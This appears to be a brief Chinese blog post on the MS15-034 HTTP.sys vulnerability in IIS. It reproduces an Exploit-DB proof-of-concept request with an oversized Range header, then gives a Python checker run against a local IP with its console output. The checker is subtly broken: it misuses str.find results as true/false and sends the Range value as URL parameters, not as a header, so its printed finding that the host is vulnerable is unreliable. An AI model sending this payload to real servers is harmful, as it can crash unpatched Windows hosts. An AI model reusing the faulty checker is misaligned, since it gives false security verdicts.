1.
Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034) 网站参考:https://www.exploit-db.com/exploits/36773
文档中显示bug信息
/*
UNTESTED - MS15-034 Checker
THE BUG:
8a8b2112 56 push esi
8a8b2113 6a00 push 0
8a8b2115 2bc7 sub eax,edi
8a8b2117 6a01 push 1
8a8b2119 1bca sbb ecx,edx
8a8b211b 51 push ecx
8a8b211c 50 push eax
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4
BY: john.b.hale@gmai.com
Twitter: @rhcp011235
*/
// our evil buffer
char request1[]="GET / HTTP/1.1\r\nHost: stuff\r\n
Range: bytes=0-18446744073709551615\r\n\r\n";
2.MS15-034测试方法连接网页
https://blog.csdn.net/Jiajiajiang_/article/details/80742955
3.代码测试捕捉bug信息
#捕捉漏洞检测工具
url='http://192.168.1.3/'
r=requests.get(url)
remote_request=r.headers['Server']
if remote_request.find('IIS/10.0')or remote_request.find('IIS/8.5'):
protype={'Host':'stuff','Range':'bytes = 0 - 18446744073709551615'}
r1=requests.get(url,params=protype)
print(r1.request.headers)
print(r1.content)
if str(r1.content).find('Requested Range Not Satisfiable'):
print(url+' already exits')
else:
print(url+'not exits')
else:
print('Server not has IIS/10.0')
4.
1.获取url地址的方式
2.控制台信息
{'User-Agent': 'python-requests/2.23.0', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}
b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />\r\n<title>IIS Windows</title>\r\n<style type="text/css">\r\n<!--\r\nbody {\r\n\tcolor:#000000;\r\n\tbackground-color:#0072C6;\r\n\tmargin:0;\r\n}\r\n\r\n#container {\r\n\tmargin-left:auto;\r\n\tmargin-right:auto;\r\n\ttext-align:center;\r\n\t}\r\n\r\na img {\r\n\tborder:none;\r\n}\r\n\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="container">\r\n<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>\r\n</div>\r\n</body>\r\n</html>'
http://192.168.1.3/ already exits
Microsoft-IIS/10.0
网站路径显示信息
网友评论